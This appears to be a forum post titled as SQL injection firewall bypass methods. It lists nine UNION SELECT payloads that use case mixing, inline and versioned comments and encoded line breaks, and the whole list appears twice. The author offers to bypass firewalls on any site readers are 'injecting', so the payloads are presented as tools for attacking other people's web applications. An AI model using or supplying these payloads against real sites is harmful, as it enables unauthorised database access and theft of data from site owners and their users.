I want to share WAF evasion methods for sql Injections. Most are old but few are newer. You can bypass most of the "404 forbidden" and "NOT Acceptable" errors by these methods.
Sql Injections WAF bypass methods
1) id=1+UnIoN+SeLecT 1,2,3—
2) id=1+UnIOn/**/SeLect 1,2,3—
3) id=1+UNIunionON+SELselectECT 1,2,3—
4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
6) id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—
8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—
/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--
9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3—
If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.
credit to : ultracode
Sql Injections WAF bypass methods
1) id=1+UnIoN+SeLecT 1,2,3—
2) id=1+UnIOn/**/SeLect 1,2,3—
3) id=1+UNIunionON+SELselectECT 1,2,3—
4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
6) id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—
8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—
/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3--
9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3—
If you are injecting any site and find some complicated WAF please post here or PM me the link and I will try to bypass it for you.
credit to : ultracode
Post a Comment